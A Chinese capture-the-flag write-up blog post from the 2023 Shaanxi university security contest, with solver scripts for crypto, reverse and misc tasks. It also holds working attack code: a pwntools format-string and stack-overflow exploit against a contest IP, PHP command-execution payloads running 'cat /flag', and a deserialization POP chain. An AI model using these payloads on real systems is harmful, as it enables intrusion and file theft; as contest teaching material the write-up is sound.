2023年第三届陕西省大学生网络安全技能大赛

队伍名:Dozer
成绩:29名

以下是题解

Crypto

HaM3

板子题,开套
https://blog.cryptohack.org/cryptoctf2021-easy#hamul
呃,跑不出来,加一层爆破

from Crypto.Util.number import *
import gmpy2


n = 142672086626283587048017713116658568907056287246536918432205313755474498483915485435443731126588499776739329317569276048159601495493064346081295993762052633

high = str(n)[:18]
low = str(n)[-18:]
pq=[]
for i in range(10):
for j in range(10):
for z in range(10):
pq.append(int(high + str(i) + str(j) +str(z) + low))



for x in pq:
f = factor(x)
if (len(f) == 2 and f[0][0].nbits() == 64):
p, q = f[0][0], f[1][0]
print(p,q)
break

p,q = 9937378783676979077,14357114660923972229
c = 35771468551700967499031290145813826705314774357494021918317304230766070868171631520643911378972522363861624359732252684003796428570328730483253546904382041
e = 65537

PP = int(str(int(str(p) + str(q))) + str(int(str(q) + str(p))))
QQ = int(str(Q) + str(P))
d = inverse(e,(PP-1)*(QQ-1))
m = pow(c,d,PP*QQ)
print(long_to_bytes(m))

奇怪的sar

在这个网站找了脚本,用enc得到 p^q的值

https://blog.csdn.net/superprintf/article/details/108964563

n =  137670797028117726329534659376416493367957852768263083700434198723955223922183386928456013703791817601151754417828367188186912209697081337658512940425529211281290630976671911327606706953154608427885071841566358882014021242768190762103365969320014710368160869517966437591299370072284930202718943785099916898209
output =  [101737402423360536260958229788866250367716256968287178187558336481872788309727545478736771692477306412259739856568227009850831432381180909815512654609798228982433082928392936844193974517574281026029228179913579225687286945054175762659252515268270399329404664775893089132101252158524000295899895962104782878103, 37355684997487259669354747104430314505839306993101096210478266975184357608742619438151118843905165289324251734149329596611854110739738607745107961453008343886403511257039401245484528985856920723694142989180291902939107642020398816995584650913417698279936585230648639613028793148102494100898288564799111024672, 58677759595639211550435023449462812079890625834313820227189340593596480924226619376872336960357021314847975570175387751632125898437020801920862764666175594874885587518469384576361008639967382152477408865298759987606155830674598034578657554841283906976808719095766296677147076808250022898199866472085742989883, 61841632061818470036288407041172200048676249787061823756736224887116113640875444187463656719652972233582538657844183320242896612625995507633237074900538692102956750184024574603018257213912795847625926653585010890014291951218199774765624860625726555381815237888483974246173727262881650634287497285246796321130, 7618244158597756867387754433401378508070531356170836765779245254233413235386172690733378371343899289510629513166609513857423499004879497768588665836034791151090648182168421570449377835494883902907064269417199065924565304966242954268460876762295575715334403142360198583318323418975108290758222653083011275844, 106276841058222138994123556391380518368163552919305398852484130331884811278068151915582752795463570013359693610495645946230044828403849434903415989487924763756589202218361370725532394478569304449884620166937809374355282324069422109879874964479199929174533104879048175102339134830614476339153367475243140156049, 54574757236475194407137831004617398270525645136836468973535243574661043352422598443323384197261529289829451787586618886007968913414366545291507686451774653217577858375086817168124727394445167274831801876424578654786480330913650363551771258617533162477541882336257099777912519011890593910515860435759936717781, 15567087904962670212229825713697043597876172881256160613623383896576159414077875401117959132252949501643234465895697270909085179587988268864498823765197994781747034644583869111599516151129007414228897958635533561248099927507725880289417298814703767549313482346652043188826434944367260731729064673486516315207, 10757138067445225320504771816863593606847219020279502671965413470243269270456133564739090471033889069283122519782525412134604896073598293410977787230108853737796640474070194546344190858079847734817109910030714675258996740807873872365037296486121580542250452443305370358407408558223735250474249180772656905880, 68097848963949068260912124852455363245291187860801223898468533992003737157497436432969031551088942445561676359631354280979357356539429863946694570097104716411407829017684705171462511875250672979623888463245258237680782731827727876526411531354910982579164963119481534453651300645314177478026462894232377307020]


MMI = lambda A, n,s=1,t=0,N=0: (n < 2 and t%N or MMI(n, A%n, t, s-A//n*t, N or n),-1)[n<1] #逆元计算
a=(output[2]-output[1])*MMI((output[1]-output[0]),n)%n
ani=MMI(a,n)
b=(output[1]-a*output[0])%n
seed = (ani*(output[0]-b))%n
plaintext=seed
print(seed)

注意到题目n=p*qand seed=p ^ q。这个网站可以这样分解n

https://github.com/sliedes/xor_factor

#!/usr/bin/env python3

import math
import sys

def check_cong(k, p, q, n, xored=None):
    kmask = (1 << k) - 1
    p &= kmask
    q &= kmask
    n &= kmask
    pqm = (p*q) & kmask
    return pqm == n and (xored is None or (p^q) == (xored & kmask))

def extend(k, a):
    kbit = 1 << (k-1)
    assert a < kbit
    yield a
    yield a | kbit

def factor(n, p_xor_q):
    tracked = set([(p, q) for p in [0, 1] for q in [0, 1]
                   if check_cong(1, p, q, n, p_xor_q)])

    PRIME_BITS = int(math.ceil(math.log(n, 2)/2))

    maxtracked = len(tracked)
    for k in range(2, PRIME_BITS+1):
        newset = set()
        for tp, tq in tracked:
            for newp_ in extend(k, tp):
                for newq_ in extend(k, tq):
                    # Remove symmetry
                    newp, newq = sorted([newp_, newq_])
                    if check_cong(k, newp, newq, n, p_xor_q):
                        newset.add((newp, newq))

        tracked = newset
        if len(tracked) > maxtracked:
            maxtracked = len(tracked)
    print('Tracked set size: {} (max={})'.format(len(tracked), maxtracked))

    # go through the tracked set and pick the correct (p, q)
    for p, q in tracked:
        if p != 1 and p*q == n:
            return p, q

    assert False, 'factors were not in tracked set. Is your p^q correct?'

def main():
    if len(sys.argv) != 3:
        print('Usage: xor_factor.py n p_xor_q', file=sys.stderr)
        print('(give both numbers in decimal)', file=sys.stderr)

    n =  24044063028844014127418595700558729326190738802687551098858513077613750188240082663594575453404975706225242363463089392757425008423696150244560748490108425645064339883915929498539109384801415313004805586193044292137299902797522618277016789979196782551492020031695781792205215671106103568559626617762521687128199445018651010056934305055040748892733145467040663073395258760159451903432330506383025685265502086582538667772105057401245864822281535425692919273252955571196166824113519446568745718898654447958192533288063735350717599092500158028352667339959012630051251024677881674246253876293205648190626145653304572328397


    p_xor_q = 39428646082513135314545544161912595458975375891528176714825766497155482031976852156313956476772023258684487799640179241987139554034654104867011313090105438798561154654679825702410748780286094326639330840289843154525176685892323447168072417654823748596238888125898914210332775882916911771786984574407163323116

    p, q = factor(n, p_xor_q)
    print(p)
    print(q)

if __name__ == '__main__':
    main()

Usage: xor_factor.py n p_xor_q
(give both numbers in decimal)
Tracked set size: 456 (max=592)
136684274356315612487659217209422309110679526145315687701807802133803279866185818899991993884467313793599158843950483228582160463511388849758567202472905559846777250024605202939046541380251340624743050639969339200934727970697454003281829379562185118379160449090683059062519707425788095221998247228048681125693
175909504894211247364395617174091428768974985846552891279489073681785877028619520625043017232062800318796180901847503827906224008040782018396669843628458963255715414759414738416930428210387093039711088082737992450479987000339480311499183821667504225082440337907962316839883506834373795587694663967806384498129

分解之后就是正常的rsa

from Crypto.Util.number import *
p = 136684274356315612487659217209422309110679526145315687701807802133803279866185818899991993884467313793599158843950483228582160463511388849758567202472905559846777250024605202939046541380251340624743050639969339200934727970697454003281829379562185118379160449090683059062519707425788095221998247228048681125693
q = 175909504894211247364395617174091428768974985846552891279489073681785877028619520625043017232062800318796180901847503827906224008040782018396669843628458963255715414759414738416930428210387093039711088082737992450479987000339480311499183821667504225082440337907962316839883506834373795587694663967806384498129
n =  24044063028844014127418595700558729326190738802687551098858513077613750188240082663594575453404975706225242363463089392757425008423696150244560748490108425645064339883915929498539109384801415313004805586193044292137299902797522618277016789979196782551492020031695781792205215671106103568559626617762521687128199445018651010056934305055040748892733145467040663073395258760159451903432330506383025685265502086582538667772105057401245864822281535425692919273252955571196166824113519446568745718898654447958192533288063735350717599092500158028352667339959012630051251024677881674246253876293205648190626145653304572328397
c =  14883053247652228283811442762780942186987432684268901119544211089991663825267989728286381980568977804079766160707988623895155236079459150322336701772385709429870215701045797411519212730389048862111088898917402253368572002593328131895422933030329446097639972123501482601377059155708292321789694103528266681104521268192526745361895856566384239849048923482217529011549596939269967690907738755747213669693953769070736092857407573675987242774763239531688324956444305397953424851627349331117467417542814921554060612622936755420459029769026126293588814831034143264949347763031994934813475762839410192390466491651507733968227

d = inverse(65537,(p-1)*(q-1))
m = pow(c,d,n)
print(long_to_bytes(m))

pwn

陕西游玩

首先checksec看一下

IDA打开

huashan是一个溢出点

格式化字符串泄露main函数,求基地址,找gadgets的地址,栈溢出即可

from pwn import *
p=remote("121.196.192.181",10001)
#p=process("./kj")
elf=ELF('./kj')
context(log_level = 'debug',arch = 'amd64')
#gdb.attach(p)
p.recvuntil(b"Your choice :\n")
p.sendline(b'2')
p.recvuntil(b"Welcome to Terra_Cotta_Warriors\n")
p.send(b'%19$p')
base=int(p.recv(14),16)-0x12eb
print("base=",hex(base))
docker=base+0x129A
p.recvuntil(b"Your choice :\n")
p.sendline(b'1')
p.recvuntil(b"Welcome to Huashan_Mountain\n")
payload=b'a'*0x28+p64(docker)
p.sendline(payload)
p.interactive()

#flag{0758fce358ceab884ced023bf80e6bc4}

reverse

我的upx -d怎么坏了

upx手脱壳参考博客
https://blog.csdn.net/weixin_45986910/article/details/107993680
脱出来之后拖入ida

迷宫题,可能是脱得不够彻底,运行不了,直接静态看,可以看出是一个15*15的迷宫,直接写脚本画出迷宫

试了很多次,发现有限制是最短路径(
成功画出来后是这么走的

RRRDRRURRRRRRDDDDRDDD

flag是这串字符串的32位小写md5加密

babypython

下载下来是一个txt文件,点进去看发现是python字节码指令

翻到最后有个倒序的base64

=1nb0A3b7AUQwB3b84mQ/E0MvJUb+EXbx5TQwF3bt52bAZncsd9c

观察关键代码之后发现需要替换一些字符,脚本如下

arr = '=1nb0A3b7AUQwB3b84mQ/E0MvJUb+EXbx5TQwF3bt52bAZncsd9c'

def str_reverse3(s):
    s1 = ""
    for s2 in s[::-1]:
        s1 += s2

    return s1


if __name__ == '__main__':
    rs = str_reverse3(arr)
    print(rs)
    rs2 = ""
    for i in range(len(rs)):
        if(rs[i] == '1'):
            rs2 += 'g'
        elif rs[i] == '3':
            rs2 += 'H'
        elif rs[i] == '9':
            rs2 += 'W'
        else:
            rs2 += rs[i]
    print(rs2)


接下来先base解密,然后减3异或8即可

rs3 = "qglrv@onmlqpA>qmq>mBo3A?Bn<lppA@;lp4nx"
rs4 = ""
for i in range(len(rs3)):
    rs4 += chr((ord(rs3[i]) - 3) ^ 8)
print(rs4)

WEB

unserialize

没禁掉PHP系统函数passthru,直接利用就可以了
?a=passthru ('cat /flag');

ezrce

要post传入:

 name=hahaha&qaq=eval(array_rand(array_flip(apache_request_headers())))

请求头添加

H: system('cat /flag');

Get传入

?key=admin

最终payload:

POST /?key=admin HTTP/1.1
Host: 4744404a.clsadp.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36 
Content-Type: application/x-www-form-urlencoded 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 
Accept-Encoding: gzip, deflate 
Accept-Language: zh-CN,zh;q=0.9 
Connection: close 
Content-Length: 70 
H: system('cat /flag'); 
name=hahaha&qaq=eval(array_rand(array_flip(apache_request_headers())))

ezpop

发现

/pop3ZTgMw.php

编写pop链
最终payload:

<?php
class night
{
public $night;
public function __construct(){
$this->night = new day();
}
}
class day
{
public $day;
}
class light
{
public $light;
public function __construct(){
$this->light = new day;
$this->light->day= new dark;
}
}

class dark
{
public $dark="php://filter/read=convert.base64-encode/resource=/flag";
}
$a=new night();
$b=new day();
$c=new light();
$d=new dark();
$a->night=$b;
$b->day=$d;
$d->dark=$c;

echo (((serialize($a))));
?>

最终payload:

 O:5:"night":2:{s:5:"night";O:3:"day":1:{s:3:"day";O:4:"dark":1: {s:4:"dark";O:5:"light":1:{s:5:"light";O:3:"day":1:{s:3:"day";O:4:"dark":1: {s:4:"dark";s:54:"php://filter/read=convert.base64-encode/resource=/flag";}}}}}}

Misc

可是雪啊飘进双眼

音频后半段有摩斯密码
 

SNOW.exe得到压缩包密码
shanxiroujiamo
压缩包里面key.jpg有隐藏文件  

密码表解密

BC1PVEYD  
用steghide 得到flag  

管道

Bilockchain

被销毁的flag

原数据: 0x608060405234801561001057600080fd5b507f666c61677b53306d6574316d34735f64347430727900000000000000000000006000819055507f5f63346e5f6e30745f6434743072797d000000000000000000000000000000006001819055506101088061006e6000396000f3fe6080604052348015600f57600080fd5b5060043610603c5760003560e01c80633004511f14604157806349ed739414605b57806383197ef0146075575b600080fd5b6047607d565b6040516052919060af565b60405180910390f35b60616083565b604051606c919060af565b60405180910390f35b607b6089565b005b60015481565b60005481565b3373ffffffffffffffffffffffffffffffffffffffff16ff5b60a98160c8565b82525050565b600060208201905060c2600083018460a2565b92915050565b600081905091905056fea2646970667358221220a954f9072211ed340a4d15743f2a9638dec45f64442563e2d5caff879cb7cb3a64736f6c63430008070033  
utf-8
€@R4€aW€ý[Pflag{S0met1m4s_d4t0ryUP_c4n_n0t_d4t0ry}UPa€an9óþ€@R4€W€ý[P6<W5à€c0QAW€cIís”[W€cƒ~ðuW[`€ý[`G`}V[`@Q`R‘`¯V[`@Q€‘ó[`a`ƒV[`@Q`l‘`¯V[`@Q€‘ó[`{`‰V[[`TV[`TV[3sÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ[``ÈV[‚RPPV[`` ‚P`Â`ƒ„`¢V[’‘PPV[`P‘PVþ¢dipfsX" Tù "í4
Mt?*–8ÞÄ_dD%câÕÊÿ‡œ·Ë:dsolcC 3

拼接:flag{S0met1m4s_d4t0ry_c4n_n0t_d4t0ry}

re复现

babycoffey
下载发现是js混淆代码,找到js解混淆网站
https://tool.yuanrenxue.cn/decode_obfuscator

查看源代码直接写脚本就可以了

c = [233, 129, 127, 238, 145, 144, 11, 43, 87, 134, 243, 158, 197, 216, 111, 136, 152, 29, 204, 31, 26, 228, 39, 148, 215, 220, 90, 76, 251, 57, 183, 184, 150, 157, 156, 176, 13, 41, 30, 86, 244, 8];
arr = [135, 25, 72, 151, 195, 212, 228, 212, 250, 101, 39, 77, 163, 77, 70, 167, 119, 184, 7, 77, 144, 154, 93, 10, 185, 48, 179, 77, 71, 163, 67, 61, 113, 156, 196, 136, 239, 241, 128, 93, 84, 156];
for i in range(42):
    arr[i] ^= c[41-i]
for i in range(42):
    arr[i] ^= c[i]
for i in range(42):
    print(chr(arr[i]),end="")

flag{I_c0uld_neu3r_undeRstand_jvaVs3rIpt!}

posted @ 2023-06-03 19:07  ㅤ浮虚千年  阅读(739)  评论(0编辑  收藏  举报